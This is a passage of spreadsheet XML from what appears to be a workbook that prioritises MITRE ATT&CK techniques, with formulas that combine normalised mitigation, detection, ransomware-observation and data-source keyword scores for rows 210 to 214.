        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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10" spans="1:47" ht="48">
      <c r="A210" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7194285714285721E-2</v>
      </c>
      <c r="B210" s="25">
        <f>SUM(H210,M210,V210)*(1+SUM(AE210,AG210,AI210,AK210,AM210))</f>
        <v>0.37194285714285719</v>
      </c>
      <c r="C210" s="25" t="s">
        <v>919</v>
      </c>
      <c r="D210" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E210" s="25" t="s">
        <v>920</v>
      </c>
      <c r="F210" s="51">
        <v>1</v>
      </c>
      <c r="G210" s="51">
        <v>1</v>
      </c>
      <c r="H210" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I210">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J210">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K210">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L210">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M210" s="25">
        <v>0</v>
      </c>
      <c r="N210" s="51">
        <v>0</v>
      </c>
      <c r="O210" s="51">
        <v>0</v>
      </c>
      <c r="P210" s="51">
        <v>2</v>
      </c>
      <c r="Q210" s="51">
        <v>0</v>
      </c>
      <c r="R210" s="52" t="s">
        <v>921</v>
      </c>
      <c r="S210" s="51">
        <v>8</v>
      </c>
      <c r="T210" s="52" t="s">
        <v>922</v>
      </c>
      <c r="U210" s="51">
        <v>15</v>
      </c>
      <c r="V210" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142856</v>
      </c>
      <c r="W210">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X210">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y210">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z210">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA210">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB210">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC210" s="29" t="s">
        <v>923</v>
      </c>
      <c r="AD210" s="25" t="str" cm="1">
        <f t="array" ref="AD210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE210" s="25">
        <f>IF(AD210="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF210" s="25" t="str" cm="1">
        <f t="array" ref="AF210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG210" s="25">
        <f>IF(AF210="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH210" s="25" t="str" cm="1">
        <f t="array" ref="AH210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC210)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI210" s="25">
        <f>IF(AH210="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ210" s="25" t="str" cm="1">
        <f t="array" ref="AJ210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK210" s="25">
        <f>IF(AJ210="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL210" s="25" t="str" cm="1">
        <f t="array" ref="AL210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM210" s="25">
        <f>IF(AL210="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN210" s="60">
        <v>0</v>
      </c>
      <c r="AO210" s="51">
        <v>0</v>
      </c>
      <c r="AP210" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7194285714285721E-2</v>
      </c>
      <c r="AQ210" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1239809523809524</v>
      </c>
      <c r="AR210" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1239809523809524</v>
      </c>
      <c r="AS210" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT210" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU21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11" spans="1:47" ht="48">
      <c r="A211" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.705E-2</v>
      </c>
      <c r="B211" s="25">
        <f>SUM(H211,M211,V211)*(1+SUM(AE211,AG211,AI211,AK211,AM211))</f>
        <v>0.37050000000000005</v>
      </c>
      <c r="C211" s="25" t="s">
        <v>924</v>
      </c>
      <c r="D211" s="25" t="s">
        <v>464</v>
      </c>
      <c r="E211" s="25" t="s">
        <v>925</v>
      </c>
      <c r="F211" s="51">
        <v>1</v>
      </c>
      <c r="G211" s="51">
        <v>0</v>
      </c>
      <c r="H211" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I211">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J211">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K211">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L211">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M211" s="25">
        <v>0</v>
      </c>
      <c r="N211" s="51">
        <v>0</v>
      </c>
      <c r="O211" s="51">
        <v>0</v>
      </c>
      <c r="P211" s="51">
        <v>0</v>
      </c>
      <c r="Q211" s="51">
        <v>0</v>
      </c>
      <c r="R211" s="52" t="s">
        <v>926</v>
      </c>
      <c r="S211" s="51">
        <v>12</v>
      </c>
      <c r="T211" s="52" t="s">
        <v>927</v>
      </c>
      <c r="U211" s="51">
        <v>12</v>
      </c>
      <c r="V211" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142856</v>
      </c>
      <c r="W211">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>24</v>
      </c>
      <c r="X211">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Y211">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Z211">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA211">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB211">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC211" s="29" t="s">
        <v>928</v>
      </c>
      <c r="AD211" s="25" t="str" cm="1">
        <f t="array" ref="AD211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC211)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE211" s="25">
        <f>IF(AD211="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF211" s="25" t="str" cm="1">
        <f t="array" ref="AF211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC211)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG211" s="25">
        <f>IF(AF211="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH211" s="25" t="str" cm="1">
        <f t="array" ref="AH211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC211)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI211" s="25">
        <f>IF(AH211="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ211" s="25" t="str" cm="1">
        <f t="array" ref="AJ211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC211)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK211" s="25">
        <f>IF(AJ211="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL211" s="25" t="str" cm="1">
        <f t="array" ref="AL211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC211)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM211" s="25">
        <f>IF(AL211="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN211" s="60">
        <v>0</v>
      </c>
      <c r="AO211" s="51">
        <v>0</v>
      </c>
      <c r="AP211" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.705E-2</v>
      </c>
      <c r="AQ211" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12350000000000001</v>
      </c>
      <c r="AR211" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12350000000000001</v>
      </c>
      <c r="AS211" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT211" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU21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12" spans="1:47" ht="63.95">
      <c r="A212" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.2811428571428591E-2</v>
      </c>
      <c r="B212" s="25">
        <f>SUM(H212,M212,V212)*(1+SUM(AE212,AG212,AI212,AK212,AM212))</f>
        <v>0.49478095238095249</v>
      </c>
      <c r="C212" s="25" t="s">
        <v>929</v>
      </c>
      <c r="D212" s="25" t="s">
        <v>401</v>
      </c>
      <c r="E212" s="25" t="s">
        <v>930</v>
      </c>
      <c r="F212" s="51">
        <v>1</v>
      </c>
      <c r="G212" s="51">
        <v>1</v>
      </c>
      <c r="H212" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I212">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J212">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K212">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L212">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M212" s="25">
        <v>0</v>
      </c>
      <c r="N212" s="51">
        <v>0</v>
      </c>
      <c r="O212" s="51">
        <v>1</v>
      </c>
      <c r="P212" s="51">
        <v>0</v>
      </c>
      <c r="Q212" s="51">
        <v>2</v>
      </c>
      <c r="R212" s="52" t="s">
        <v>402</v>
      </c>
      <c r="S212" s="51">
        <v>14</v>
      </c>
      <c r="T212" s="51" t="s">
        <v>403</v>
      </c>
      <c r="U212" s="51">
        <v>8</v>
      </c>
      <c r="V212" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22380952380952385</v>
      </c>
      <c r="W212">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X212">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y212">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z212">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA212">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB212">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC212" s="29" t="s">
        <v>931</v>
      </c>
      <c r="AD212" s="25" t="str" cm="1">
        <f t="array" ref="AD212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC212)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE212" s="25">
        <f>IF(AD212="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF212" s="25" t="str" cm="1">
        <f t="array" ref="AF212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC212)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG212" s="25">
        <f>IF(AF212="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH212" s="25" t="str" cm="1">
        <f t="array" ref="AH212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC212)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI212" s="25">
        <f>IF(AH212="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ212" s="25" t="str" cm="1">
        <f t="array" ref="AJ212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC212)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK212" s="25">
        <f>IF(AJ212="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL212" s="25" t="str" cm="1">
        <f t="array" ref="AL212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC212)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM212" s="25">
        <f>IF(AL212="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN212" s="60">
        <v>1</v>
      </c>
      <c r="AO212" s="51">
        <v>1</v>
      </c>
      <c r="AP212" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.2811428571428591E-2</v>
      </c>
      <c r="AQ212" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16492698412698417</v>
      </c>
      <c r="AR212" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16492698412698417</v>
      </c>
      <c r="AS212" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT212" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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13" spans="1:47">
      <c r="A213" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.2721257142857143</v>
      </c>
      <c r="B213" s="25">
        <f>SUM(H213,M213,V213)*(1+SUM(AE213,AG213,AI213,AK213,AM213))</f>
        <v>0.38792380952380945</v>
      </c>
      <c r="C213" s="25" t="s">
        <v>932</v>
      </c>
      <c r="D213" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E213" s="25" t="s">
        <v>933</v>
      </c>
      <c r="F213" s="51">
        <v>1</v>
      </c>
      <c r="G213" s="51">
        <v>1</v>
      </c>
      <c r="H213" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I213">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J213">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K213">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L213">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M213" s="25">
        <v>0</v>
      </c>
      <c r="N213" s="51">
        <v>2</v>
      </c>
      <c r="O213" s="51">
        <v>15</v>
      </c>
      <c r="P213" s="51">
        <v>0</v>
      </c>
      <c r="Q213" s="51">
        <v>4</v>
      </c>
      <c r="R213" s="52" t="s">
        <v>318</v>
      </c>
      <c r="S213" s="51">
        <v>2</v>
      </c>
      <c r="T213" s="51" t="s">
        <v>934</v>
      </c>
      <c r="U213" s="51">
        <v>11</v>
      </c>
      <c r="V213" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22380952380952379</v>
      </c>
      <c r="W213">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X213">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y213">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z213">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>21</v>
      </c>
      <c r="AA213">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.21</v>
      </c>
      <c r="AB213">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.21</v>
      </c>
      <c r="AC213" s="29" t="s">
        <v>607</v>
      </c>
      <c r="AD213" s="25" t="str" cm="1">
        <f t="array" ref="AD213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC213)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE213" s="25">
        <f>IF(AD213="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF213" s="25" t="str" cm="1">
        <f t="array" ref="AF213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC213)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG213" s="25">
        <f>IF(AF213="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH213" s="25" t="str" cm="1">
        <f t="array" ref="AH213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC213)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI213" s="25">
        <f>IF(AH213="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ213" s="25" t="str" cm="1">
        <f t="array" ref="AJ213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC213)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK213" s="25">
        <f>IF(AJ213="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL213" s="25" t="str" cm="1">
        <f t="array" ref="AL213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC213)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM213" s="25">
        <f>IF(AL213="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN213" s="58">
        <v>7</v>
      </c>
      <c r="AO213" s="51">
        <v>1</v>
      </c>
      <c r="AP213" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.2721257142857143</v>
      </c>
      <c r="AQ213" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12930793650793648</v>
      </c>
      <c r="AR213" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12930793650793648</v>
      </c>
      <c r="AS213" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT213" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU21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14" spans="1:47" ht="48">
      <c r="A214" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9449523809523808E-2</v>
      </c>
      <c r="B214" s="25">
        <f>SUM(H214,M214,V214)*(1+SUM(AE214,AG214,AI214,AK214,AM214))</f>
        <v>0.3611619047619048</v>
      </c>
      <c r="C214" s="25" t="s">
        <v>935</v>
      </c>
      <c r="D214" s="25" t="s">
        <v>348</v>
      </c>
      <c r="E214" s="25" t="s">
        <v>936</v>
      </c>
      <c r="F214" s="51">
        <v>1</v>
      </c>
      <c r="G214" s="51">
        <v>1</v>
      </c>
      <c r="H214" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I214">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J214">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K214">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L214">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M214" s="25">
        <v>0</v>
      </c>
      <c r="N214" s="51">
        <v>0</v>
      </c>
      <c r="O214" s="51">
        <v>0</v>
      </c>
      <c r="P214" s="51">
        <v>0</v>
      </c>
      <c r="Q214" s="51">
